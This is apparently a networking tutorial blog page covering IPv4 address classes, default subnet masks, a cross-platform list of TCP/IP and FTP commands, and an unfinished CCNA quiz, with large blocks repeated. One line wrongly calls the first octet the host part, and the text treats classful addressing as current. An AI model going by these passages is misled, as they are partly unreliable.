Maximum numbers of possible Networks= 2^(no of network bits – constant bits)
= 2^(16-2) = 2^14
=16384.
Maximum number of possible clients or hosts= 2^number of host bits – 2
=2^16 - 2 = 65536-2
= 65534.
3. CLASS C :-
If the value in the 1st octet in between 192-223, then IP belongs to Class C. This class also doesnt' have any reserved value in the Network Part.
It has 3 Network Parts and 1 Host Part:
Network Part Network Part Network Part Host Part
|----8bits--| |---8bits----| |----8bits-----| |---8bits---|
Here too the last 3 octets can have values between 0-255 (except for the last octet which can have between 1-254. The reason is already stated in Class ‘A’).
In Network Part:
1st Eight bits may be: 110xxxxx (where x=0/1).
H ere the 1st 3 bits are constant .
Like the last 2 classes the minimum value of 1st octet will be: 11000000 =192 (where x=0)
Maximum value of 1st octet: 11011111=223(where x=1).
Therefore the range is 192-223.
Maximum numbers of possible Networks= 2^(no of network bits – constant bits)
= 2^(24-3) = 2^21
= 2097152.
Maximum number of possible clients or hosts= 2^number of host bits – 2
=2^8 - 2 = 256-2
= 254.
Since this Class has least number of possible hosts, it is used by small to medium companies. But generally big companies use class B addresses.
4-5. Class D:-
If the value is between 224 -239, it belongs to class D. And if its between 240-255 it belongs to Class E.
The Class D & E IP addresses are not for public use. Class D addresses are used for Multicasting(Remember broadcasting, here in multicasting,the number of clients are limited or a particular group of hosts are the recipients ) by routers and servers. It is for internal use and for administrative works.
Class E is reserved particularly for Research and Development.
Now that you have a great deal of knowledge on IP, you should also know about SUBNET MASK. In networking generally, subnet mask goes in parallel with IP.
SUBNET MASK
It is also a 32 bit address used by computer to distinguish between Network Part and Host Part.
Since the computer internally works on binary it needs something in binary to get the 2 parts.
The 255 value represents Network Part and 0 represents Host Part.
The Default subnet masks for the 3 Classes are:
Class A: 255.0.0.0
Class B: 255.255.0.0
Class C: 255.255.255.0
Note: The word default is being used because these subnet addresses are considered to be according to class. There’s another use of subnet mask called Subnetting and in that subnet masks are different from the above mentioned addresses.
IP Address Management Principles and Practice (IEEE Press Series on Network Management)
Internet protocol or IP is an address given to each computer in network. The address is a 32 bit numeric value consisting of numbers separated by dots. It has network part and host part. The network is the address of network to which you belong like the area code or colony name... and the host part is address of the particular computer or client like your house's address.
Each IP address has both the things.
The IP address is divided into 4 parts each of 8 bits and each part is called an octet. The parts are divided by a Dot. The first octet is always the host part and the last octet is always the host part.
The IP address is written in 3 ways:
1. Binary Form: 11000000.10101000.00000000.00000001
2. Dotted Decimal Form: 192.168.0.1
3. Hexadecimal Form: C0-A8-00-01
This type of IP address consisting of 32 bit is called IPv4 or IP version 4. Since only near about 4 billion IP Address could be formed with 32 bits IP address or v4. And the left IP addresses(not yet used) for other people was very limited, a new version of IP was developed called IPv6 which is a 128 bit IP address.
We will talk about this later.
Dotted Decimal:
The way we use for writing IP address is dotted decimal. Since the computer only understands Binary numbers , therefore internally in computer IP address is also converted into binary before being used by the computer and routers.
As already stated above, the 1st octet is always used for Network ID or Network Part and the last for Host part. 2nd and 3rd octet may be used for Network part or host part.
On the basis of the range of values in the 1st octet the IP address may be classified in 5 different classes:
1. Class A
2. Class B
3. Class C
4. Class D
5. Class E
1. CLASS A :-
If the value in 1st octet is between 0-127 it belongs to Class A. But the 1st address and the last address i.e. 0 and 127 are reserved for special cases. It can’t be used by public for a particular computer. The 127.x.y.z is reserved for loop back function to check the network settings in a computer.
The IP address of class A has 1 network part and 3 host part.
Network Part Host Part Host Part Host Part
|----8bits-| |----8bits----| |----8bits----| |----8bits----|
The Last 3 parts may contain any value from 0-255(except the in the 4th part where we can use only till 254,).
In Network Part:
1st Eight bits may be: 0xxxxxxx where x=0/1
The 1st bit is constant and is 0.
Therefore the minimum value is: 00000000=0 (where x=0)
The maximum value =01111111=127(where x=1 )
That is why the range for 1st class is from 0-127.
Maximum number of possible networks=2^ ( total number of network bits – constant bits) – reserved addresses
= 2^ (8-1) – 2 = 2^7-2 = 128-2= 126.
Maximum number of possible clients per network=2^no of host bits -2
= 2^24 -2 = 16777216 – 2=16777214 address.
Note: This 2 is being subtracted because 2 host addresses are already reserved for Administrative tasks. The 1st host address in every network (which may be 0 for example: in class C this could be 192.168.1.0 where only the last part is host part.) and the last for broadcasting i.e.to send a message to all the hosts in a network (Suppose in a network using Class ‘A’ address. If the server would like to sent a message to all the clients it can just sent the message to this broadcast address and it will be forwarded to all. You can’t manually enter every client’s IP address, as there could be as many as 16777214 clients). So it will be subtracted in every class i.e.in A,B and C.
This means that in 1 network there can be 16777214 clients for class A.
2. CLASS B :-
If the value in 1st octet is between 128-191 it belongs to Class B. This class also doesn’t have any reserved value in the Network Part. This has 2 Network Part and 2 Host Part:
Network Part Network Part Host Part Host Part
|--8bits--| |----8bits----| |----8bits-- |-----8bits----|
Here also the last 3 octet may have any value between 0-255 (except for the last octet which can have between 1-254. The reason is already stated in Class ‘A’) since the class is decided only by the 1st octet.
In the Network Parts:-
Range: 128-191.
1st Eight Bits may be: 10xxxxxx (where x=0/1)
As in class A 1st bit was constant in this class 1st 2 bits are constant and are: 1 & 0.
Therefore Minimum value of 1st octet could be: 10000000 = 128 (where x=0)
And maximum value =10111111=191(where x=1).
That’s why the range is 128-191.
Maximum numbers of possible Networks= 2^(no of network bits – constant bits)
= 2^(16-2) = 2^14
=16384.
Maximum number of possible clients or hosts= 2^number of host bits – 2
=2^16 - 2 = 65536-2
= 65534.
3. CLASS C :-
If the value in the 1st octet in between 192-223, then IP belongs to Class C. This class also doesnt' have any reserved value in the Network Part.
It has 3 Network Parts and 1 Host Part:
Network Part Network Part Network Part Host Part
|----8bits--| |---8bits----| |----8bits-----| |---8bits---|
Here too the last 3 octets can have values between 0-255 (except for the last octet which can have between 1-254. The reason is already stated in Class ‘A’).
In Network Part:
1st Eight bits may be: 110xxxxx (where x=0/1).
H ere the 1st 3 bits are constant .
Like the last 2 classes the minimum value of 1st octet will be: 11000000 =192 (where x=0)
Maximum value of 1st octet: 11011111=223(where x=1).
Therefore the range is 192-223.
Maximum numbers of possible Networks= 2^(no of network bits – constant bits)
= 2^(24-3) = 2^21
= 2097152.
Maximum number of possible clients or hosts= 2^number of host bits – 2
=2^8 - 2 = 256-2
= 254.
Since this Class has least number of possible hosts, it is used by small to medium companies. But generally big companies use class B addresses.
4-5. Class D:-
If the value is between 224 -239, it belongs to class D. And if its between 240-255 it belongs to Class E.
The Class D & E IP addresses are not for public use. Class D addresses are used for Multicasting(Remember broadcasting, here in multicasting,the number of clients are limited or a particular group of hosts are the recipients ) by routers and servers. It is for internal use and for administrative works.
Class E is reserved particularly for Research and Development.
Now that you have a great deal of knowledge on IP, you should also know about SUBNET MASK. In networking generally, subnet mask goes in parallel with IP.
SUBNET MASK
It is also a 32 bit address used by computer to distinguish between Network Part and Host Part.
Since the computer internally works on binary it needs something in binary to get the 2 parts.
The 255 value represents Network Part and 0 represents Host Part.
The Default subnet masks for the 3 Classes are:
Class A: 255.0.0.0
Class B: 255.255.0.0
Class C: 255.255.255.0
Note: The word default is being used because these subnet addresses are considered to be according to class. There’s another use of subnet mask called Subnetting and in that subnet masks are different from the above mentioned addresses.
IP Address Management Principles and Practice (IEEE Press Series on Network Management)
Thursday, March 25, 2010
Summary of TCP/IP commands for all platforms..
INTRODUCTION
This summary lists many of the commonly used commands (with
brief descriptions) for FTP and TCP/IP, as well as related z/OS,
z/VM, VSE, Linux, and VTAM commands.
TCP/IP Commands for TSO/E
**Note: The following TCP/IP commands should be done from the
TSO command panel or the READY prompt.
Note: hostname may be the IP address of the host, or the host
name of the host.
• FTP hostname {port} - Connect to remote host to get/put files.
Defaults to port 21.
• HOMETEST - Validate TCP/IP configuration.
• NETSTAT option {TCP procname} - Display network status
of local host. Use ? for list of options.
• NETSTAT ALLCON|CONN - Display port connections for
the TCP/IP stack.
• NETSTAT ARP ALL|ipaddress - Display ARP cache for the
TCP/IP stack.
• NETSTAT DEV - Display the status of the device(s) and
link(s) for the TCP/IP stack.
• NETSTAT GATE|ROUTE - Display routing information for
the TCP/IP stack. (Different views)
• NETSTAT HOME - Display IP address(es) for the stack.
• PING hostname - Sends an echo request to a host name or
address to determine if the computer is accessible. Use ? for list
of options.
• TELNET hostname {port} - Log on to remote host. By default,
port 23 is used. Use ? for list of options.
• TRACERTE hostname - Trace hops from this host to
destination host. Use ? for list of options.
z/OS Console Commands for TCP/IP
***Note: If multiple stacks are running, you must identify the stack in
the procname field.
• D TCPIP - list names and status of TCP/IP stacks.
• D TCPIP,{procname},HELP - display list of TCP/IP display
options. These include -NETSTAT, TELNET, HELP,
DISPLAY, VARY, OMPROUTE, SYSPLEX, STOR.
• D TCPIP,{procname},Netstat,ALLCONN|CONN - display
socket information for the TCP/IP stack.
• D TCPIP,{procname},Netstat,ARP - display contents of ARP
cache for the TCP/IP stack.
• D TCPIP,{procname},Netstat,DEVlinks - display Device and
link status for the TCP/IP stack.
• D TCPIP,{procname},Netstat,HOME - display the IP
address(es) for the TCP/IP stack.
• D TCPIP,{procname},Netstat,ROUTE - display the routing
table for the TCP/IP stack.
• V TCPIP,{procname},HELP - display list of TCP/IP vary
options. These include - HELP, OBEYFILE, PKTTRACE,
DATTRACE, START, STOP, PURGECACHE
• V TCPIP,{procname},PURGECACHE,linkname - purge
ARP cache for the specified adapter (linkname from
NETSTAT,DEVLINKS).
• V TCPIP,{procname},START|STOP,devname - Start or stop
the device name identified in NETSTAT DEV output.
• V TCPIP,{procname},Telnet,xxxx - performs specified
function for TELNET.
ACT|INACT,luname - Enables|disables lu as VTAM
session candidate
QUIESCE - Blocks new connections.
RESUME - Ends QUIESCEd state.
STOP - Ends telnet connections and closes port.
Related z/OS Console Commands :
• D IOS,MIH,DEV=dddd - MIH value for device
Note: The value for "c's and d's" in the following Display
Matrix (D M) command is optional, but if included, must be in
parentheses ().
• D M=CHP{(cc)}|DEV{(dddd)} - Status of CHPID cc, or
summary of all CHPIDs if (cc) is not provided.
Display CHPIDs/device status or summary of CHPID status of
all devices if (dddd) is not provided.
• D U,,ALLOC|OFFLINE|ONLINE - Display information for
all devices by selected status.
• D U,,,dddd{,nnn} - Display status of devices starting at device
dddd for nnn number of devices (default 16).
• SETIOS MIH,DEV=ddd,TIME=mm:ss - set MIH time for
specified device.
• V dddd|dddd-dddd,OFFLINE|ONLINE - vary device(s)
offline or online.
• CF CHP(cc),ONline|OFFline - Configure online/offline
CHPID cc to MVS & hardware.
z/VM Operator Commands:
***Note: Requires class B authority to issue the following commands.
• Q MITIME - Display MIH times for devices.
• Q OSA ACTIVE|ALL - display status of OSA devices.
• Q rdev|rdev-rdev - Display status of real device(s).
• Q PATHS rdev|rdev-rdev - Display path status to real
device(s) (PIM, PAM, LPM).
• Q CHPID cc - Display real CHPID status.
• VARY OFF|ON rdev|rdev-rdev - vary device(s) off or online
• VARY OFF|ON PATH cc FROM|TO rdev|rdev-rdev -
change the status of a path to device(s).
• VARY OFF|ON CHPID cc - configure a CHPID off or on to
both hardware and software.
z/VM TCP/IP Commands:
***Note: Your CMS userid must be linked to the TCPMAINT 592
minidisk to execute the following commands.
***Note: hostname may be the IP address of the host, or the host
name of the host.
• FTP hostname {port} - Connect to remote host to get/put files.
Defaults to port 21. Enter FTP ? for list of options.
• HOMETEST - Validate TCP/IP configuration.
• IFCONFIG - display network interfaces.
• IFCONFIG interface UP|DOWN - Start or stop the specified
network interface.
• NETSTAT option - Display network status of local host. Use ?
for list of options.
• NETSTAT ALLCON|CONN - Display all port connections
for the TCP/IP stack.
• NETSTAT ARP *|ipaddress - Display ARP cache for the
TCP/IP stack.
• NETSTAT DEV - Display the status of the device(s) and
link(s) for the TCP/IP stack.
• NETSTAT GATE - Display TCP/IP routing information.
• NETSTAT HOME - Display IP address(es) in TCP/IP stack.
• NETSTAT OBEY START|STOP devname - Start or stop the
device name identified in NETSTAT DEV output.
• PING hostname - Sends an echo request to a host name or
address to determine if the computer is accessible. Use ? for list
of options.
• TELNET hostname {port} - Log on to remote host. By default,
port 23 is used. Use ? for list of options.
• TRACERTE hostname - Trace hops from this host to
destination host. Use ? for list of options.
VSE TCP/IP Commands:
***Note: hostname may be the IP address of the host, or the host
name of the host.
• PING hostname - Sends an echo request to a host name or
address to determine if the computer is accessible.
• Query ARP{,IP=hostname} - Display contents of ARP cache
for the TCP/IP stack.
• Query CON{,IP=hostname} - Display port connections for
the TCP/IP stack.
• Query LINKs{,ID=name} - Display link status.
• Query MASKs - Display contents of subnet mask table.
• Query ROUTes{ID=name|,IP=hostname} - Display routing
table for the TCP/IP stack.
• STATUS dddd - Display device status
• START LINK=name -start a link in the TCP/IP stack.
• STOP LINK=name -suspends attempts to activate a link.
• Note: Use with CTCA and cross-partition links (not OSA).
• TRACERT hostname - Trace hops from this host to
destination host.
VTAM Commands:-
VTAM commands related to OSA cards.
• D NET,ID=name - display network named in ID field
Additional parameters that may be added:
,SCOPE=ONLY|ACT|ALL|INACT
,E - Gives extended information about the node.
• D NET,MAJNODES|APPLS - Shows status of all active
major nodes or applications.
• D NET,PENDING - Lists nodes in pending states.
• D NET,TRL - display list of TRLEs.
• D NET,TRL,TRLE=trlename - display status of specific
TRLE. (Use this command to display the devices assigned to a
QDIO (or MPC) OSA-Express resource.)
• V NET,ACT,ID=ISTTRL,UPDATE=ALL - Deletes all
inactive TRLEs.
• V NET,ACT,ID=name - Activates the VTAM resource
identified by the name.
• V NET,INACT,ID=name - Inactivates the VTAM resource
identified by the name.
,F|I|U - Deactivate FORCE, IMMEDIATE, or
UNCONDITIONAL (if normal inact fails).
TCP/IP Commands for OS/2:-
***Note:Commands must be done from a command prompt window.
The commands are listed in upper case for presentation only. They
should be entered in lower case.
***Note: hostname may be the IP address of the host, or the host
name of the host.
• ARP -A - Display ARP cache. Use -? for options.
• FTP hostname {port} - Connect to remote host to get/put files.
Defaults to port 21. Use -? for list of options.
NETSTAT command output may roll through the OS/2 window. To
prevent this, add |more to the end of the netstat command. (Or direct
output to a file by adding >filename.TXT to the end of the
NETSTAT command.)
• HOST ipaddress - Sends request to an IP address and returns
information about the hostname.
• NETSTAT -? - Display a list of options.
• NETSTAT -A - Display host network address.
• NETSTAT -C - Display host ICMP statistics.
• NETSTAT -H - host name for specified IP address.
• NETSTAT -I - Display host IP statistics.
• NETSTAT -N - Display host network interface details. (Like
MAC, speed, and statistics)
• NETSTAT -P - Display host ARP cache.
• NETSTAT -R - Display host routes.
• NETSTAT -S - Display host sockets.
• NETSTAT -T - Display host TCP statistics.
• NETSTAT -U - Display host UDP statistics.
• PING hostname - Sends an echo request to a host name or
address to determine if computer is accessible. (To cancel, use
Ctrl + C.) Use -? for list of options.
• TELNET {-p port} hostname - Log on to remote host. By
default, port 23 is used. Use -? for list of options.
• TRACERTE hostname - Trace hops from this host to
destination host. Use -? for list of options.
TCP/IP Commands for Windows(older):
***Commands should work for Windows 95, 98, NT, & 2000 1.
Commands must be done from a command prompt window.
The commands are listed in upper case for presentation only. They
should be entered in lower case.
***Note: hostname may be the IP address of the host, or the host
name of the host.
• ARP -A - Display ARP cache. Use -? for options.
• FTP hostname - Connect to remote host to get/put files.
Defaults to port 21. Use -? for list of options.
Note: The output of the NETSTAT command may roll through your
window. To prevent this, add |more to the end of the netstat
command. (Or direct the output to a file by adding >filename.TXT
to the end of the NETSTAT command.)
• NETSTAT -? - Display a list of options.
• NETSTAT -A - Display host socket information.
• NETSTAT -E - Display host Ethernet statistics.
• NETSTAT -N - Display host addresses and ports numerically.
• NETSTAT -P TCP|UDP|IP - Display connection information
for the selected protocol.
• NETSTAT -R - Display host routes.
• NETSTAT -S - Display host statistics.
• PING hostname - Sends an echo request to a host name or
address to determine if the computer is accessible. Use -? for
list of options.
• TELNET hostname {port} - Log on to remote host. By default,
port 23 is used. Use -? for list of options.
• TRACERT hostname - Trace hops from this host to
destination host. Use -? for list of options.
1Windows, Windows 95, 98, NT, and 2000 are trademarks of Microsoft Corporation.
TCP/IP Commands for Linux:
***The commands are listed in upper case for presentation only. They
should be entered in lower case.
• ARP - Display ARP cache. Use -? for options.
• DMESG |MORE - Display complete information about the
Linux environment including network devices. ( |MORE keeps
output from scrolling.) ( > filename to send to a file.)
• FTP hostname|ipaddress - Connect to remote host to get/put
files. Defaults to port 21. Use -? for options.
• IFCONFIG - display network interfaces (like LO,EN0,TR0)
• IFCONFIG interface UP|DOWN - Start or stop the selected
network interface(EN0,TR0, etc).
For the following NETSTAT commands, adding N to the option
will display numerical output. AddingV will display verbose.
• NETSTAT -A - Display all sockets.
• NETSTAT -I - Display interface table.
• NETSTAT -R - Display host routes.
• PING hostname|ipaddress - Sends an echo request to a host to
determine if the computer is accessible. Use -? for options.
• ROUTE - Displays IP routing table.
• TELNET hostname|ipaddress {port} - Log on to remote host.
By default, port 23 is used. Use -? for options.
• TRACEROUTE hostname|ipaddress - Trace hops from this
host to destination host. Use -? for list of options.
FTP Subcommands:-
• ascii - ASCII transfer of text files.
• binary - BINARY transfer of binary files.
• cd remote-directory - Change directory on remote host.
• close - Ends the FTP session. After close, OPEN a new
connection or QUIT from FTP.
• delete filename - Delete the file from remote host.
• dir {file destination} - Gives full directory listing on remote
host. file - file to be listed. destination - where to put listing.
Both file and destination are optional.
• get filename {localfilename} - Get a file from remote host.
• hash - Display a hash sign (#) every time a block of data is
transferred. (Useful for large transfers.)
• help {command} - Displays a description of the command. If a
command is not specified, a list of commands is displayed.
• lcd directory - Change directory on your local machine.
• ls {file destination} - Like dir, but less information.
• mget file-list - Get multiple files from remote machine.
• mput file-list - Put multiple files to remote machine.
• open machine-name - Connect to named machine (IP or host
name). Old connection must be CLOSEd first.
• prompt - Turn prompting off/on for mget and mput.
• put filename {remotefilename} - Put a file onto remote host.
• pwd - Present Working Directory on remote host.
• quit|bye - exits FTP.
This summary lists many of the commonly used commands (with
brief descriptions) for FTP and TCP/IP, as well as related z/OS,
z/VM, VSE, Linux, and VTAM commands.
TCP/IP Commands for TSO/E
**Note: The following TCP/IP commands should be done from the
TSO command panel or the READY prompt.
Note: hostname may be the IP address of the host, or the host
name of the host.
• FTP hostname {port} - Connect to remote host to get/put files.
Defaults to port 21.
• HOMETEST - Validate TCP/IP configuration.
• NETSTAT option {TCP procname} - Display network status
of local host. Use ? for list of options.
• NETSTAT ALLCON|CONN - Display port connections for
the TCP/IP stack.
• NETSTAT ARP ALL|ipaddress - Display ARP cache for the
TCP/IP stack.
• NETSTAT DEV - Display the status of the device(s) and
link(s) for the TCP/IP stack.
• NETSTAT GATE|ROUTE - Display routing information for
the TCP/IP stack. (Different views)
• NETSTAT HOME - Display IP address(es) for the stack.
• PING hostname - Sends an echo request to a host name or
address to determine if the computer is accessible. Use ? for list
of options.
• TELNET hostname {port} - Log on to remote host. By default,
port 23 is used. Use ? for list of options.
• TRACERTE hostname - Trace hops from this host to
destination host. Use ? for list of options.
z/OS Console Commands for TCP/IP
***Note: If multiple stacks are running, you must identify the stack in
the procname field.
• D TCPIP - list names and status of TCP/IP stacks.
• D TCPIP,{procname},HELP - display list of TCP/IP display
options. These include -NETSTAT, TELNET, HELP,
DISPLAY, VARY, OMPROUTE, SYSPLEX, STOR.
• D TCPIP,{procname},Netstat,ALLCONN|CONN - display
socket information for the TCP/IP stack.
• D TCPIP,{procname},Netstat,ARP - display contents of ARP
cache for the TCP/IP stack.
• D TCPIP,{procname},Netstat,DEVlinks - display Device and
link status for the TCP/IP stack.
• D TCPIP,{procname},Netstat,HOME - display the IP
address(es) for the TCP/IP stack.
• D TCPIP,{procname},Netstat,ROUTE - display the routing
table for the TCP/IP stack.
• V TCPIP,{procname},HELP - display list of TCP/IP vary
options. These include - HELP, OBEYFILE, PKTTRACE,
DATTRACE, START, STOP, PURGECACHE
• V TCPIP,{procname},PURGECACHE,linkname - purge
ARP cache for the specified adapter (linkname from
NETSTAT,DEVLINKS).
• V TCPIP,{procname},START|STOP,devname - Start or stop
the device name identified in NETSTAT DEV output.
• V TCPIP,{procname},Telnet,xxxx - performs specified
function for TELNET.
ACT|INACT,luname - Enables|disables lu as VTAM
session candidate
QUIESCE - Blocks new connections.
RESUME - Ends QUIESCEd state.
STOP - Ends telnet connections and closes port.
Related z/OS Console Commands :
• D IOS,MIH,DEV=dddd - MIH value for device
Note: The value for "c's and d's" in the following Display
Matrix (D M) command is optional, but if included, must be in
parentheses ().
• D M=CHP{(cc)}|DEV{(dddd)} - Status of CHPID cc, or
summary of all CHPIDs if (cc) is not provided.
Display CHPIDs/device status or summary of CHPID status of
all devices if (dddd) is not provided.
• D U,,ALLOC|OFFLINE|ONLINE - Display information for
all devices by selected status.
• D U,,,dddd{,nnn} - Display status of devices starting at device
dddd for nnn number of devices (default 16).
• SETIOS MIH,DEV=ddd,TIME=mm:ss - set MIH time for
specified device.
• V dddd|dddd-dddd,OFFLINE|ONLINE - vary device(s)
offline or online.
• CF CHP(cc),ONline|OFFline - Configure online/offline
CHPID cc to MVS & hardware.
z/VM Operator Commands:
***Note: Requires class B authority to issue the following commands.
• Q MITIME - Display MIH times for devices.
• Q OSA ACTIVE|ALL - display status of OSA devices.
• Q rdev|rdev-rdev - Display status of real device(s).
• Q PATHS rdev|rdev-rdev - Display path status to real
device(s) (PIM, PAM, LPM).
• Q CHPID cc - Display real CHPID status.
• VARY OFF|ON rdev|rdev-rdev - vary device(s) off or online
• VARY OFF|ON PATH cc FROM|TO rdev|rdev-rdev -
change the status of a path to device(s).
• VARY OFF|ON CHPID cc - configure a CHPID off or on to
both hardware and software.
z/VM TCP/IP Commands:
***Note: Your CMS userid must be linked to the TCPMAINT 592
minidisk to execute the following commands.
***Note: hostname may be the IP address of the host, or the host
name of the host.
• FTP hostname {port} - Connect to remote host to get/put files.
Defaults to port 21. Enter FTP ? for list of options.
• HOMETEST - Validate TCP/IP configuration.
• IFCONFIG - display network interfaces.
• IFCONFIG interface UP|DOWN - Start or stop the specified
network interface.
• NETSTAT option - Display network status of local host. Use ?
for list of options.
• NETSTAT ALLCON|CONN - Display all port connections
for the TCP/IP stack.
• NETSTAT ARP *|ipaddress - Display ARP cache for the
TCP/IP stack.
• NETSTAT DEV - Display the status of the device(s) and
link(s) for the TCP/IP stack.
• NETSTAT GATE - Display TCP/IP routing information.
• NETSTAT HOME - Display IP address(es) in TCP/IP stack.
• NETSTAT OBEY START|STOP devname - Start or stop the
device name identified in NETSTAT DEV output.
• PING hostname - Sends an echo request to a host name or
address to determine if the computer is accessible. Use ? for list
of options.
• TELNET hostname {port} - Log on to remote host. By default,
port 23 is used. Use ? for list of options.
• TRACERTE hostname - Trace hops from this host to
destination host. Use ? for list of options.
VSE TCP/IP Commands:
***Note: hostname may be the IP address of the host, or the host
name of the host.
• PING hostname - Sends an echo request to a host name or
address to determine if the computer is accessible.
• Query ARP{,IP=hostname} - Display contents of ARP cache
for the TCP/IP stack.
• Query CON{,IP=hostname} - Display port connections for
the TCP/IP stack.
• Query LINKs{,ID=name} - Display link status.
• Query MASKs - Display contents of subnet mask table.
• Query ROUTes{ID=name|,IP=hostname} - Display routing
table for the TCP/IP stack.
• STATUS dddd - Display device status
• START LINK=name -start a link in the TCP/IP stack.
• STOP LINK=name -suspends attempts to activate a link.
• Note: Use with CTCA and cross-partition links (not OSA).
• TRACERT hostname - Trace hops from this host to
destination host.
VTAM Commands:-
VTAM commands related to OSA cards.
• D NET,ID=name - display network named in ID field
Additional parameters that may be added:
,SCOPE=ONLY|ACT|ALL|INACT
,E - Gives extended information about the node.
• D NET,MAJNODES|APPLS - Shows status of all active
major nodes or applications.
• D NET,PENDING - Lists nodes in pending states.
• D NET,TRL - display list of TRLEs.
• D NET,TRL,TRLE=trlename - display status of specific
TRLE. (Use this command to display the devices assigned to a
QDIO (or MPC) OSA-Express resource.)
• V NET,ACT,ID=ISTTRL,UPDATE=ALL - Deletes all
inactive TRLEs.
• V NET,ACT,ID=name - Activates the VTAM resource
identified by the name.
• V NET,INACT,ID=name - Inactivates the VTAM resource
identified by the name.
,F|I|U - Deactivate FORCE, IMMEDIATE, or
UNCONDITIONAL (if normal inact fails).
TCP/IP Commands for OS/2:-
***Note:Commands must be done from a command prompt window.
The commands are listed in upper case for presentation only. They
should be entered in lower case.
***Note: hostname may be the IP address of the host, or the host
name of the host.
• ARP -A - Display ARP cache. Use -? for options.
• FTP hostname {port} - Connect to remote host to get/put files.
Defaults to port 21. Use -? for list of options.
NETSTAT command output may roll through the OS/2 window. To
prevent this, add |more to the end of the netstat command. (Or direct
output to a file by adding >filename.TXT to the end of the
NETSTAT command.)
• HOST ipaddress - Sends request to an IP address and returns
information about the hostname.
• NETSTAT -? - Display a list of options.
• NETSTAT -A - Display host network address.
• NETSTAT -C - Display host ICMP statistics.
• NETSTAT -H - host name for specified IP address.
• NETSTAT -I - Display host IP statistics.
• NETSTAT -N - Display host network interface details. (Like
MAC, speed, and statistics)
• NETSTAT -P - Display host ARP cache.
• NETSTAT -R - Display host routes.
• NETSTAT -S - Display host sockets.
• NETSTAT -T - Display host TCP statistics.
• NETSTAT -U - Display host UDP statistics.
• PING hostname - Sends an echo request to a host name or
address to determine if computer is accessible. (To cancel, use
Ctrl + C.) Use -? for list of options.
• TELNET {-p port} hostname - Log on to remote host. By
default, port 23 is used. Use -? for list of options.
• TRACERTE hostname - Trace hops from this host to
destination host. Use -? for list of options.
TCP/IP Commands for Windows(older):
***Commands should work for Windows 95, 98, NT, & 2000 1.
Commands must be done from a command prompt window.
The commands are listed in upper case for presentation only. They
should be entered in lower case.
***Note: hostname may be the IP address of the host, or the host
name of the host.
• ARP -A - Display ARP cache. Use -? for options.
• FTP hostname - Connect to remote host to get/put files.
Defaults to port 21. Use -? for list of options.
Note: The output of the NETSTAT command may roll through your
window. To prevent this, add |more to the end of the netstat
command. (Or direct the output to a file by adding >filename.TXT
to the end of the NETSTAT command.)
• NETSTAT -? - Display a list of options.
• NETSTAT -A - Display host socket information.
• NETSTAT -E - Display host Ethernet statistics.
• NETSTAT -N - Display host addresses and ports numerically.
• NETSTAT -P TCP|UDP|IP - Display connection information
for the selected protocol.
• NETSTAT -R - Display host routes.
• NETSTAT -S - Display host statistics.
• PING hostname - Sends an echo request to a host name or
address to determine if the computer is accessible. Use -? for
list of options.
• TELNET hostname {port} - Log on to remote host. By default,
port 23 is used. Use -? for list of options.
• TRACERT hostname - Trace hops from this host to
destination host. Use -? for list of options.
1Windows, Windows 95, 98, NT, and 2000 are trademarks of Microsoft Corporation.
TCP/IP Commands for Linux:
***The commands are listed in upper case for presentation only. They
should be entered in lower case.
• ARP - Display ARP cache. Use -? for options.
• DMESG |MORE - Display complete information about the
Linux environment including network devices. ( |MORE keeps
output from scrolling.) ( > filename to send to a file.)
• FTP hostname|ipaddress - Connect to remote host to get/put
files. Defaults to port 21. Use -? for options.
• IFCONFIG - display network interfaces (like LO,EN0,TR0)
• IFCONFIG interface UP|DOWN - Start or stop the selected
network interface(EN0,TR0, etc).
For the following NETSTAT commands, adding N to the option
will display numerical output. AddingV will display verbose.
• NETSTAT -A - Display all sockets.
• NETSTAT -I - Display interface table.
• NETSTAT -R - Display host routes.
• PING hostname|ipaddress - Sends an echo request to a host to
determine if the computer is accessible. Use -? for options.
• ROUTE - Displays IP routing table.
• TELNET hostname|ipaddress {port} - Log on to remote host.
By default, port 23 is used. Use -? for options.
• TRACEROUTE hostname|ipaddress - Trace hops from this
host to destination host. Use -? for list of options.
FTP Subcommands:-
• ascii - ASCII transfer of text files.
• binary - BINARY transfer of binary files.
• cd remote-directory - Change directory on remote host.
• close - Ends the FTP session. After close, OPEN a new
connection or QUIT from FTP.
• delete filename - Delete the file from remote host.
• dir {file destination} - Gives full directory listing on remote
host. file - file to be listed. destination - where to put listing.
Both file and destination are optional.
• get filename {localfilename} - Get a file from remote host.
• hash - Display a hash sign (#) every time a block of data is
transferred. (Useful for large transfers.)
• help {command} - Displays a description of the command. If a
command is not specified, a list of commands is displayed.
• lcd directory - Change directory on your local machine.
• ls {file destination} - Like dir, but less information.
• mget file-list - Get multiple files from remote machine.
• mput file-list - Put multiple files to remote machine.
• open machine-name - Connect to named machine (IP or host
name). Old connection must be CLOSEd first.
• prompt - Turn prompting off/on for mget and mput.
• put filename {remotefilename} - Put a file onto remote host.
• pwd - Present Working Directory on remote host.
• quit|bye - exits FTP.
Labels:
IP and all,
Networking Core,
networking on Linux
Some Questions for CCNA Guys:
Some sample and easy questions on CCNA just to refresh you:-
1) Which of the following protocols use "Hello" packets?
A) OSPF
B) RIP2
C) IGRP
D) RIP
2) How to enable a Banner on a Cisco Router ?
A) Router(Config-if)# banner motd #
B) Router(Config)# banner motd #
C) Router(Config)# motd banner motd #
D) Router(Config-if)# motd banner #
3) How many hosts and subnets are possible if you have an IP of 151.242.16.49 with a
subnet mask of 7 bits?
A) 510 hosts and 126 subnets
B) 512 hosts and 128 subnets
C) 126 subnets and 510 hosts
D) 128 subnets and 512 hosts
4) What's the default subnet mask for a Class C IP adresses?
A) 255.0.0.0
B) 255.255.0.0
C) 255.255.255.0
D) 255.255.255.255
5) Which encapsulation must be used to enable Ethernet_II frame type on your Ethernet
interface?
A) SAP
B) ARPA
C) RIP
D) SNAP
6) Which IP-class provides the least number of Hosts?
A) Class A
B) Class B
C) Class C
D) Class D
7) How to define access-list commands ?
A) Router(config-if)# access-list 1 permit 172.16.20.1 255.255.0.0
B) Router(config) # access-list 1 permit 172.16.20.1 255.255.0.0
C) Router(config-if)# access-list 1 permit 172.16.20.1 0.0.0.0
D) Router(config) # access-list 1 permit 172.16.20.1 0.0.0.0
8) Which of the following solutions prevent routing loops?
A) Split Horizon
B) Poison Reverse
C) Hold-down Timers
D) Triggered Updates
9) Which of the following is a valid extended IP access list?
A) access-list 101 permit ip host 175.2.10.0 any eq 80
B) access-list 101 permit ip host 175.2.10.0 any eq www
C) access-list 101 permit tcp host 175.2.10.0 any eq 80
